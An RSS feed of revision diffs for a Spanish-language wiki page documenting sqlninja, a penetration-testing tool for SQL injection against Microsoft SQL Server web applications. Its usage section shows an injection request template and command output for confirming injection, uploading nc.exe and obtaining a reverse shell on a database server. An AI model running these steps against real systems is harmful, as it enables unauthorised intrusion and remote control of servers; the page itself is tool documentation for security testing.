<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Recent changes to sqlninja-es</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>Recent changes to sqlninja-es</description><atom:link href="https://sourceforge.net/p/maguey/wiki/sqlninja-es/feed" rel="self"/><language>en</language><lastBuildDate>Tue, 10 Dec 2019 16:20:23 -0000</lastBuildDate><atom:link href="https://sourceforge.net/p/maguey/wiki/sqlninja-es/feed" rel="self" type="application/rss+xml"/><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v7
+++ v8
@@ -1,6 +1,6 @@
 

-[[img src=https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png height=25% width=25% style=float:right]]
+[[img src=https://sourceforge.net/p/maguey/wiki/repo_img/attachment/MAGUEY-2-Logo.png height=25% width=25% style=float:right]]
 &lt;br/&gt;&lt;br/&gt;

 &lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-es/" style="color: #4CAB68; text-decoration: underline;"&gt;Regresar&lt;/a&gt;  &lt;a href="https://sourceforge.net/p/maguey/wiki/sqlninja-en" style="color: #4CAB68; text-decoration: underline;"&gt;English&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Tue, 10 Dec 2019 16:20:23 -0000</pubDate><guid>https://sourceforge.net0ce45acd759f37b15ccb0057d7fb34087355c910</guid></item><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v6
+++ v7
@@ -93,7 +93,7 @@
 Sqlninja rel. 0.2.6-r1&lt;br /&gt;
 Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
 [+] Parsing sqlninja.conf...&lt;br /&gt;
-[+] Target is: 172.22.3.89:80&lt;br /&gt;
+[+] Target is: xxx.xxx.xxx.xxx:80&lt;br /&gt;
 [+] Trying to inject a 'waitfor delay'....&lt;br /&gt;
    [+] Injection was successful! Let's rock !! :) &lt;br /&gt;
 &lt;br /&gt;
@@ -130,7 +130,7 @@
 Sqlninja rel. 0.2.6-r1&lt;br /&gt;
 Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
 [+] Parsing sqlninja.conf...&lt;br /&gt;
-[+] Target is: 172.22.3.89:80&lt;br /&gt;&lt;br /&gt;
+[+] Target is: xxx.xxx.xxx.xxx:80&lt;br /&gt;&lt;br /&gt;
 Local port: PUERTO_LOCAL&lt;br /&gt;
 tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP&lt;br /&gt;
 [+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...&lt;br /&gt;
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 22:13:18 -0000</pubDate><guid>https://sourceforge.netd48cd539f0b380aed80d33d8c7261f7a1fcaf127</guid></item><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v5
+++ v6
@@ -3,7 +3,7 @@
 [[img src=https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png height=25% width=25% style=float:right]]
 &lt;br /&gt;&lt;br /&gt;

-&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-en/" style="color: #4CAB68; text-decoration: underline;"&gt;Back&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="https://sourceforge.net/p/maguey/wiki/sqlninja-es" style="color: #4CAB68; text-decoration: underline;"&gt;Español&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
+&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-es/" style="color: #4CAB68; text-decoration: underline;"&gt;Regresar&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="https://sourceforge.net/p/maguey/wiki/sqlninja-en" style="color: #4CAB68; text-decoration: underline;"&gt;English&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;

 &lt;h1 style="color: #4CAB68;"&gt;sqlninja&lt;/h1&gt;

&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 21:04:56 -0000</pubDate><guid>https://sourceforge.netbc869fcd2a9025304a8b495b203274e222f86252</guid></item><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v4
+++ v5
@@ -1,6 +1,9 @@
 &lt;!-- ###################################### SPANISH VERSION ###################################### --&gt;

-&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/sqlninja-en" style="color: #4CAB68; text-decoration: underline;"&gt;English&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
+[[img src=https://sourceforge.net/p/maguey/wiki/Home/attachment/LogoMaguey.png height=25% width=25% style=float:right]]
+&lt;br /&gt;&lt;br /&gt;
+
+&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/Toolset-en/" style="color: #4CAB68; text-decoration: underline;"&gt;Back&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;a href="https://sourceforge.net/p/maguey/wiki/sqlninja-es" style="color: #4CAB68; text-decoration: underline;"&gt;Español&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;

 &lt;h1 style="color: #4CAB68;"&gt;sqlninja&lt;/h1&gt;

@@ -140,11 +143,10 @@
 HOSTNAME\USERNAME&lt;br /&gt;
 &lt;br /&gt;

-
 &lt;!-- **********************  RESOURCES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Referencias:&lt;/h3&gt;
-&lt;b&gt;Liga:&lt;/b&gt;  http://sqlninja.sourceforge.net/
+&lt;b&gt;Liga:&lt;/b&gt; http://sqlninja.sourceforge.net/
 &lt;b&gt;Autor (es):&lt;/b&gt; icesurfer
 &lt;b&gt;Contacto:&lt;/b&gt; r00t \[at\] northernfortress.net
 &lt;b&gt;Licencia:&lt;/b&gt; GPL versión 3
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 11 Dec 2013 21:04:12 -0000</pubDate><guid>https://sourceforge.nete6a7632694466c38c5d64914d504c15178eda008</guid></item><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v3
+++ v4
@@ -45,11 +45,13 @@
 &lt;!-- **********************  USAGE ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Uso básico:&lt;/h3&gt;
+&lt;p&gt;
 &lt;b&gt;Obtener una Reverse Shell del servidor base de datos. &lt;/b&gt;Llenar el archivo de configuración de sqlninja con los siguientes datos:
 &lt;ul&gt;
 &lt;li&gt;Petición HTTP con parámetro vulnerable.
 &lt;/li&gt;&lt;li&gt;IP local. 
 &lt;/li&gt;&lt;/ul&gt;
+&lt;/p&gt;

 El archivo lucirá de la siguiente manera:

&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 04 Dec 2013 04:18:24 -0000</pubDate><guid>https://sourceforge.net42dbe97c882a601a4447c252597aacc821eebc60</guid></item><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v2
+++ v3
@@ -142,7 +142,7 @@
 &lt;!-- **********************  RESOURCES ********************** --&gt;

 &lt;h3 style="color: #4CAB68;"&gt;Referencias:&lt;/h3&gt;
-&lt;b&gt;Liga:&lt;/b&gt;  http://sourceforge.net/projects/gamja/
-&lt;b&gt;Autor (es):&lt;/b&gt; Sang-hun Jeon
-&lt;b&gt;Contacto:&lt;/b&gt; p4ssion \[at\] gmail.com
-&lt;b&gt;Licencia:&lt;/b&gt; GNU General Public License version 2.0 (GPLv2)
+&lt;b&gt;Liga:&lt;/b&gt;  http://sqlninja.sourceforge.net/
+&lt;b&gt;Autor (es):&lt;/b&gt; icesurfer
+&lt;b&gt;Contacto:&lt;/b&gt; r00t \[at\] northernfortress.net
+&lt;b&gt;Licencia:&lt;/b&gt; GPL versión 3
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 04 Dec 2013 04:17:43 -0000</pubDate><guid>https://sourceforge.net23998a7dabdca97d33c40aaef682f0b9d698c949</guid></item><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;pre&gt;--- v1
+++ v2
@@ -81,7 +81,62 @@

 &lt;br /&gt;

+Una vez que se termina de llenar el archivo de configuración se procede a ejecutar la herramienta, esta nos indicará con el mensaje Injection was successful! Let's rock !! :) que la vulnerabilidad es explotable.

+&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
+root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t&lt;br /&gt;
+Sqlninja rel. 0.2.6-r1&lt;br /&gt;
+Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
+[+] Parsing sqlninja.conf...&lt;br /&gt;
+[+] Target is: 172.22.3.89:80&lt;br /&gt;
+[+] Trying to inject a 'waitfor delay'....&lt;br /&gt;
+   [+] Injection was successful! Let's rock !! :) &lt;br /&gt;
+&lt;/div&gt;&lt;br /&gt;
+
+Ejecute el comando . /sqlninja -m u y eleja la opción apps/nc.exe. 
+
+&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
+root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u&lt;br /&gt;
+Sqlninja rel. 0.2.6-r1&lt;br /&gt;
+Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
+[+] Parsing sqlninja.conf...&lt;br /&gt;
+[+] Target is: HOST_ATAQUE&lt;br /&gt;
+  Specify the binary or script file to upload&lt;br /&gt;
+  shortcuts:&lt;br /&gt;
+    1: apps/nc.exe&lt;br /&gt;
+    2: apps/dnstun.exe&lt;br /&gt;
+    3: apps/churrasco.exe&lt;br /&gt;
+    4: apps/icmpsh.exe&lt;br /&gt;
+    5: apps/vdmallowed.exe&lt;br /&gt;
+    6: apps/vdmexploit.dll&lt;br /&gt;
+  &gt; 1&lt;br /&gt;
+[+] Uploading /tmp/nc.scr debug script............&lt;br /&gt;
+1540/1540 lines written         &lt;br /&gt;
+done!&lt;br /&gt;
+[+] Converting script to executable... might take a while&lt;br /&gt;
+[+] Checking that nc.exe has the expected filesize...&lt;br /&gt;    
+[+] Filesize corresponds... :)
+&lt;/div&gt;&lt;br /&gt;
+
+La herramienta subirá un archivo con el objetivo de ejecutar un Reverse Shell, utilice el siguiente comando para lograrlo ./sqlninja -m r.
+
+&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
+root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r&lt;br /&gt;
+Sqlninja rel. 0.2.6-r1&lt;br /&gt;
+Copyright (C) 2006-2011 icesurfer &lt;br /&gt;
+[+] Parsing sqlninja.conf...&lt;br /&gt;
+[+] Target is: 172.22.3.89:80&lt;br /&gt;&lt;br /&gt;
+Local port: PUERTO_LOCAL&lt;br /&gt;
+tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP&lt;br /&gt;
+[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...&lt;br /&gt;
+&lt;br /&gt;
+Microsoft Windows #### [Version #####]&lt;br /&gt;
+(C) Copyright 1985-2000 Microsoft Corp.&lt;br /&gt;
+&lt;br /&gt;
+C:\WINNT\system32&gt;whoami&lt;br /&gt;
+whoami&lt;br /&gt;
+HOSTNAME\USERNAME&lt;br /&gt;
+&lt;/div&gt;&lt;br /&gt;

 &lt;!-- **********************  RESOURCES ********************** --&gt;
&lt;/pre&gt;
&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 04 Dec 2013 04:16:45 -0000</pubDate><guid>https://sourceforge.net44e48707eda0e4763ae7352b82ccac91e64174e7</guid></item><item><title>sqlninja-es modified by Maguey</title><link>https://sourceforge.net/p/maguey/wiki/sqlninja-es/</link><description>&lt;div class="markdown_content"&gt;&lt;!-- ###################################### SPANISH VERSION ###################################### --&gt;
&lt;div id="link" style="text-align: right;"&gt;&lt;p&gt;&lt;a href="https://sourceforge.net/p/maguey/wiki/sqlninja-en" style="color: #4CAB68; text-decoration: underline;"&gt;English&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;h1 style="color: #4CAB68;"&gt;sqlninja&lt;/h1&gt;
&lt;!-- **********************  PHASES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Fase(s):&lt;/h3&gt;
&lt;p&gt;Principal: Explotación.&lt;br /&gt;
Secundaria: N/A.&lt;/p&gt;
&lt;!-- **********************  DESCRIPTION ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Descripción:&lt;/h3&gt;
&lt;p&gt;Es una herramienta cuya finalidad es ayudar en la explotación de vulnerabilidades SQL Injection en una aplicación Web, el aplicativo deberá tenercomo manejador de base dedatos Microsoft SQL Server. Provee  módulos de ejecución cuya finalidadvadesde la obtención de información del manejador de base de datos, hasta obtener acceso al sistema operativo por medio de una shell. &lt;/p&gt;
&lt;!-- **********************  OBJECTIVE ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Objetivo:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Comprometer el servidor de base de datos por medio de la explotación de la vulnerabilidad SQL Injection.
&lt;/li&gt;&lt;/ul&gt;
&lt;!-- **********************  FEATURES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Funcionalidades:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Tecnologías soportadas:&lt;/b&gt; Aplicaciones Web (HTTP/HTTPS).&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Modo de ejecución:&lt;/b&gt; Activo.&lt;/p&gt;
&lt;p&gt;
Comprometer el servidor de base de datos por medio de la explotación de la vulnerabilidad SQL Injection para obtener acceso al servidor por medio de una shell.
&lt;ul&gt;
&lt;li&gt;Obtiene información acerca del estado y configuraciones generales de la base de datos y del servidor de base de datos.
&lt;/li&gt;&lt;li&gt;Carga archivos ejecutables cuyo objetivo es generar una shell del servidor de base datos al equipo atacante.
&lt;/li&gt;&lt;li&gt;Realiza ataques de fuerza bruta para obtener acceso con la cuenta “sa” de SQL Server
&lt;/li&gt;&lt;li&gt;Abusa de la funcionalidad que posee el manejador SQL Server de poder ejecutar comandos del sistema. 
&lt;/li&gt;&lt;/ul&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Reportes:&lt;/b&gt;&lt;br /&gt;
Resultados exportables:  &lt;span style="color: #4CAB68; font-weight: bold; font-style: italic; font-size: 20px;"&gt;X&lt;/span&gt;
&lt;/p&gt;
&lt;!-- **********************  USAGE ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Uso básico:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Obtener una Reverse Shell del servidor base de datos. &lt;/b&gt;Llenar el archivo de configuración de sqlninja con los siguientes datos:&lt;br /&gt;
&lt;ul&gt;&lt;br /&gt;
&lt;li&gt;Petición HTTP con parámetro vulnerable.&lt;br /&gt;
&lt;/li&gt;&lt;li&gt;IP local. &lt;br /&gt;
&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;
&lt;p&gt;El archivo lucirá de la siguiente manera:&lt;/p&gt;
&lt;div id="code" style="background-color: #85BF93; padding-top: 20px; padding-right: 0px; padding-bottom: 20px; padding-left: 40px; margin-top: 0px; margin-right: 10px; margin-bottom: 0px; margin-left: 10px; border: 0px solid;"&gt;
… &lt;br /&gt;
########### HTTP REQUEST ############&lt;br /&gt;
# The entire HTTP request, including the exploit string and a marker for the &lt;br /&gt;
# SQL command to execute (__SQL2INJECT__)&lt;br /&gt;
# Be sure to include the vulnerable parameter and the character sequence that&lt;br /&gt;
# allows us to start injecting commands. In general this means, at least:&lt;br /&gt;
# - an apostrophe (if the parameter is a string)&lt;br /&gt;
# - a semicolon (to end the original query) &lt;br /&gt;
&lt;br /&gt;
--httprequest_start-- &lt;br /&gt;
POST http://URL/PAGE.aspx HTTP/1.1&lt;br /&gt;
Host: HOST_APPLICACION&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0) &lt;br /&gt;
OTRAS_CABECERAS&lt;br /&gt;
&lt;br /&gt;
__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&amp;&lt;br /&gt;__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6&amp;amp;param_vulnerable=Dato';__SQL2INJECT__&amp;amp;ctl02=Search%21 &lt;br /&gt;
--httprequest_end—&lt;br /&gt;
&lt;br /&gt;
…&lt;br /&gt;
&lt;br /&gt;
# Local host: your IP address (for backscan and revshell modes)&lt;br /&gt;
lhost = localhost&lt;br /&gt;
&lt;br /&gt;
… &lt;br /&gt;
&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;&lt;/p&gt;
&lt;!-- **********************  RESOURCES ********************** --&gt;
&lt;h3 style="color: #4CAB68;"&gt;Referencias:&lt;/h3&gt;
&lt;p&gt;&lt;b&gt;Liga:&lt;/b&gt; &lt;a href="http://sourceforge.net/projects/gamja/"&gt;http://sourceforge.net/projects/gamja/&lt;/a&gt;&lt;br /&gt;
&lt;b&gt;Autor (es):&lt;/b&gt; Sang-hun Jeon&lt;br /&gt;
&lt;b&gt;Contacto:&lt;/b&gt; p4ssion [at] gmail.com&lt;br /&gt;
&lt;b&gt;Licencia:&lt;/b&gt; GNU General Public License version 2.0 (GPLv2)&lt;/p&gt;&lt;/div&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Maguey</dc:creator><pubDate>Wed, 04 Dec 2013 04:12:34 -0000</pubDate><guid>https://sourceforge.net95b52be6ac425a8d693060e334cbae1a509b46bb</guid></item></channel></rss>